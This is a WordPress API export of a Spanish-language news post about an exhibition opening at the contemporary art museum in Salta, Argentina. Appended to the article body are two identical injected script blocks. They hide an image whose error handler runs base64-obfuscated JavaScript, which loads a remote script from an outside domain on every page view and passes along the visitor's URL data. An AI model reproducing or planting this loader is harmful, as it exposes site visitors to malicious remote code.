{"id":1893,"date":"2022-12-05T11:02:06","date_gmt":"2022-12-05T14:02:06","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1893"},"modified":"2025-08-14T00:28:44","modified_gmt":"2025-08-14T03:28:44","slug":"se-realizo-la-inauguracion-de-las-ultimas-adquisiciones-patrimoniales-en-el-mac","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1893","title":{"rendered":"Se realiz\u00f3 la inauguraci\u00f3n de las \u00faltimas adquisiciones patrimoniales en el MAC"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#6a4f04\"><em>El Museo de Arte Contempor\u00e1neo de Salta organiz\u00f3 una velada con diversas actividades y propuestas culturales. La misma cont\u00f3 con la destacada presencia de autoridades provinciales y artistas invitados.<\/em><\/h4>\n\n\n\n<p>Qued\u00f3 inaugurada una nueva muestra en el MAC, con obras de arte adquiridas por la provincia entre los a\u00f1os 2019 y 2022, presentando as\u00ed una nueva edici\u00f3n del Proyecto Adquisiciones, con las obras incorporadas a la colecci\u00f3n del museo en dicho per\u00edodo.<\/p>\n\n\n\n<p>Cabe destacar que el Museo adquiri\u00f3 importantes obras, las cuales fueron generosamente donadas por artistas y coleccionistas; incorporadas a trav\u00e9s de los Salones Provinciales de Artes Visuales y tambi\u00e9n por la participaci\u00f3n del MAC en el Programa para museos de la Fundaci\u00f3n Arteba, ediciones 2021 y 2022.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5122-se-realizo-la-inauguracion-de-las-ultimas-adquisiciones-patrimoniales-en-el-mac.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5122-se-realizo-la-inauguracion-de-las-ultimas-adquisiciones-patrimoniales-en-el-mac.jpg\" alt=\"Se realiz\u00f3 la inauguraci\u00f3n de las \u00faltimas adquisiciones patrimoniales en el MAC\"\/><\/a><\/figure>\n\n\n\n<p>En el marco de la muestra Adquisiciones, la reconocida artista&nbsp;<strong>Carolina Antoniadis<\/strong>&nbsp;present\u00f3 el libro Domus Ornamental. Antoniadis ingres\u00f3 a la colecci\u00f3n del MAC en el 2021 con su obra \u201cLa sombra secreta\u201d. En simult\u00e1neo, se inaugur\u00f3 la exposici\u00f3n \u201cLegado\u201d, dentro del proyecto V.A.C.A. (Vidrieras de Arte Contempor\u00e1neo Argentino), del artista J. Javier Torres. La misma consiste en cartones con collage y pintados de animales marinos y basura representada sobre los mismos, con sombras proyectadas que dan un efecto tridimensional y la sensaci\u00f3n de que est\u00e1n despegados del soporte.<\/p>\n\n\n\n<p>Por \u00faltimo, se present\u00f3 \u201cPerros de la Calle\u201d, una muestra colectiva integrada por nueve artistas salte\u00f1os, quienes eligieron trabajar de manera grupal, buscando afirmar su postura frente a la perspectiva individualista del circuito de las artes y al discurso de la modernidad, que encierra al sujeto sobre s\u00ed mismo. La muestra, que resulta impactante, incluye diversas modalidades art\u00edsticas como dibujos, pinturas, esculturas, arte objeto, instalaciones y procesos.<\/p>\n\n\n\n<p>Participaron de la muestra el secretario de Cultura de Salta,<strong>&nbsp;Diego Ashur<\/strong>, la subsecretaria de Patrimonio Cultural,&nbsp;<strong>Claudia Lamas<\/strong>, la directora del MAC,&nbsp;<strong>Valeria Cabrera<\/strong>.&nbsp;<strong>Elena Cornejo<\/strong>, titular de Gestiones en Red de Gobierno;&nbsp;<strong>Pablo Outes<\/strong>, coordinador de Enlace y Relaciones Pol\u00edticas;&nbsp;<strong>Marianela P\u00e9rez<\/strong>, coordinadora general del Ministerio de Desarrollo Social y el presidente de REMSA,&nbsp;<strong>Alberto Castillo<\/strong>.&nbsp;<\/p>\n\n\n\n<p>La presencia de las autoridades representa una importante muestra de apoyo para nuestra cultura, para los artistas y para todo el equipo que trabaja en pos del patrimonio cultural.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5123-se-realizo-la-inauguracion-de-las-ultimas-adquisiciones-patrimoniales-en-el-mac.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5123-se-realizo-la-inauguracion-de-las-ultimas-adquisiciones-patrimoniales-en-el-mac.jpg\" alt=\"Se realiz\u00f3 la inauguraci\u00f3n de las \u00faltimas adquisiciones patrimoniales en el MAC\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-realizo-la-inauguracion-de-las-ultimas-adquisiciones-patrimoniales-en-el-mac-86619\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Museo de Arte Contempor\u00e1neo de Salta organiz\u00f3 una velada con diversas actividades y propuestas culturales. La misma cont\u00f3 con la destacada presencia de autoridades provinciales y artistas invitados. Qued\u00f3 inaugurada una nueva muestra en el MAC, con obras de arte adquiridas por la provincia entre los a\u00f1os 2019 y 2022, presentando as\u00ed una nueva [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1894,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,9],"tags":[],"class_list":{"0":"post-1893","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1893"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1893"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1893\/revisions"}],"predecessor-version":[{"id":7254,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1893\/revisions\/7254"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1894"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1893"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1893"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1893"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}